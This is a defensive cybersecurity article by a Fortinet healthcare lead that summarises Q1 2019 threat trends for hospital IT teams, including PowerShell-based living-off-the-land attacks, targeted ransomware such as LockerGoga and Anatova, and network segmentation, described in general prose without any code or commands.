By Sonia E. Arista, CISM
National Healthcare Lead, Fortinet
Reviewing and responding to current threat intelligence is an essential part of any organization’s cybersecurity strategy. However, the need to regularly consult threat data and update defenses is amplified in the healthcare space, where interruptions to networks can be life-threatening. This is especially true as health systems become more reliant on technology and connected devices tied directly to patients and critical patient care. In addition, the average healthcare organization spends $1.4 million recovering from a breach, which impacts hospital revenue and can severely undermine reputation and trust — two cornerstones of patient experience and retention.
To minimize the risk of successful cyberattacks, security and IT teams must be constantly aware of the new methods designed to infiltrate networks and translate this into new tactics in their security efforts.
Threats to the Healthcare Space
While security teams need to remain abreast of all major threat trends — even those that seemingly only target other industries — there are a few standouts from the most recent Threat Landscape Report, which examines data collected during Q1 of 2019, that could specifically impact healthcare.
Living Off the Land
This refers to a style of attack that appeared consistently throughout Q1. Cybercriminals leverage pre-installed tools, such as PowerShell, that come on targeted systems and can be exploited to launch attacks. This approach facilitates evasion, as the malicious code that is injected appears to be part of a sanctioned process, making it harder for security teams to detect and define. PowerShell, which comes installed on Windows machines, is one of the most popular targets for these types of attacks. Cybercriminals use PowerShell to deliver ransomware and other malicious payloads, to encrypt data and move laterally across the network.
This is a tactic that healthcare IT teams must be highly aware of, especially given the number of IoT devices connecting to the network. Health systems are constantly deploying new connected tools as part of patient treatments, many of which were not built with security in mind. To address this, IT teams should conduct regular checks on devices to ensure no pre-installed tools have been compromised, thereby acting as an entryway into the network.
There have been several high-profile ransomware attacks this year, which have demonstrated a high degree of targeting and planning. In fact, in one instance of LockerGoga, the attackers had already done the due diligence to gain privileged credentials that enabled the execution of the malware. With these credentials, they were able to operate with minimal evasion or obfuscation tactics deployed. This indicates that they had already evaluated the network defenses and determined these measures unnecessary.
Anatova was another standout ransomware in Q1, encrypting as many files as possible and ensuring minimal chances of restoration. Overall, it looks as though criminals are moving away from a purely opportunistic model of malware distribution to focus on specifically selected networks.
With this in mind, health systems must strengthen their malware defenses and ensure they have current data backups. Hospitals are known to be targets for ransomware attacks, as they are more willing to pay to reclaim data, most likely due to deficiencies or poor planning in data recovery and continuity processes. Upon payment of the ransom, reclaimed data may be corrupted or missing, leading to a potential impact on patient safety.
Pre- and Post-Compromise Activity
Evaluating the types of websites being leveraged and the phase in the cyber kill chain at which they were accessed provides insight into how cybercriminals structure their attacks, helping with defense efforts. It was interesting to note when pre- and post-compromise activity occurs. Pre-compromise activity is three times more likely to occur during the work week, as there is often unintentional employee involvement. Post-compromise activity, however, occurs fairly consistently across weekdays and weekends, as little to no user interface is required.
This brings to mind an important point about segmentation. Healthcare is an industry of constant uptime. The emergency department network, for example, must be running at all times, including the weekend, and cannot be halted or slowed due to an attack. However, there are other departments that close. Should a device belonging to that department log on during off time, such unusual behavior could be an indicator of an attack. Compromised systems operating during irregular business hours to initiate or extend attacks, or to move laterally across the network, could possibly affect high-need networks like the ED. This is why healthcare systems should segment essential networks to add an extra layer of defense while isolating those devices exhibiting anomalous behavior until their intention can be determined.
Final Thoughts on Health IT Cybersecurity
Healthcare systems are common targets for cyberattacks. Staying aware of popular attack vectors and strategies enables IT teams to better secure crucial network functions. Moving forward, health IT teams should keep these Q1 findings in mind and fortify defenses accordingly.